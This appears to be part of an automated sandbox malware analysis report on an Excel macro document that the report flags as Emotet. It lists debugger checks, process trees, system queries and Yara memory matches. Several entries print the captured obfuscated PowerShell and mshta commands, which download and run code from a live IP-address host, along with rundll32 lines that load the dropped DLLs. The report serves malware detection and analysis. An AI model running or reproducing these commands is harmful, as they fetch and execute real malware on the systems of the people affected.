Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00234087 mov eax, dword ptr fs:[00000030h] 15_2_00234087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_003B4087 mov eax, dword ptr fs:[00000030h] 16_2_003B4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002B4087 mov eax, dword ptr fs:[00000030h] 17_2_002B4087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 11_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 11_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: 2022-28-01_1202.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information
barindex
Yara detected Emotet
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.a50000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3f0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.22e0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.990000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2df0000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f90000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2960000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.960000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.380000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.23b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c60000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e30000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.cc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2490000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ea0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.310000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.29f0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.390000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2290000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3120000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.520000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e70000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27d0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.22e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ab0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2260000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2c40000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e20000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a20000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.30f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2ee0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d20000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3130000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.4b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.c90000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f30000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2270000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2380000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.370000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3100000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ae0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.608492557.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667504927.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667870525.0000000002DF1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565617411.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.566094968.0000000002380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667560205.0000000002AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568518476.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667419702.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608452137.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608835240.0000000000C61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.531678798.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667165192.0000000002290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608404160.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529589229.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565770614.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.528939071.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608758914.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667142438.0000000002261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667531977.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565871959.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666923512.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568211571.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611962960.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667706749.0000000002C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529026211.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529348749.0000000000960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667352422.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609013404.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.609038210.0000000002E31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565688432.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666878998.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667611615.0000000002B11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668008278.0000000002F91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529634937.0000000002F31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.611361259.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.530108491.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667590732.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.669688860.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.667897137.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529436746.0000000002270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608896622.0000000000CC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529463306.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.529946931.0000000003131000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568292263.0000000000251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.666799791.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.608866669.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
